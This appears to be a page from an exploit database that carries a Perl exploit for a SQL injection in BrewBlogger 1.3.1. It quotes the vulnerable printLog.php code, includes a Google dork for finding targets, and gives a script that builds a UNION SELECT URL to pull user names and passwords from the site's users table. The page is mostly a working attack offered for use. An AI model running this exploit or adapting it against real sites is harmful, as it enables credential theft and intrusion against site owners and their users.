0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability
=================================================================== BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability =================================================================== #!/usr/bin/perl ########################################################################################### #Target: # # BewBlogger 1.3.1 # #Vulnerability: # # SQL Injection # #Description: # # BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php. # Since each user entry contains an auto-incrementing ID number, it is possible to # enumerate all user names and passwords stored in the 'users'database by iterating # through every possible ID number. # #Vulnerable Code (truncated): # # $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']); # $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log); # $log = mysql_query($query_log, $brewing) or die(mysql_error()); # #Usage: # This script will produce a URL which will reveal the user name and password for # the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for # the first user). The user name will be listed as "Method:" under 'General # Information', and the password will be listed as "Cost:". # #Usage: # ./brewblog.pl <domain name + path> [user id] # #Examples: # # ./brewblogger.pl www.beerblog.com 3 # ./brewblogger.pl www.mysite.com/beerblog # #Google Dork: # # intext:"BrewBlogger for PHP" # #Discovery/code: # # Craig Heffner ########################################################################################### print ' ########################################### # BrewBlogger 1.3.1 SQL Injection Exploit # # # # Discovered and coded by: Craig Heffner # ########################################### '; if(!$ARGV[0] || $ARGV[0] eq "-h"){ print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n"; exit; } if(!$ARGV[1]){ $id = 2; } else { $id = $ARGV[1]; } $url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+"; $a = 1; while($a < 211){ if($a == 8){ $string .= "user_name,"; } elsif($a == 9){ $string .= "password,"; } elsif($a == 210){ $string .= "1"; } else { $string .= "1,"; } $a++; } print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n"; exit; # 0day.today [2024-07-02] #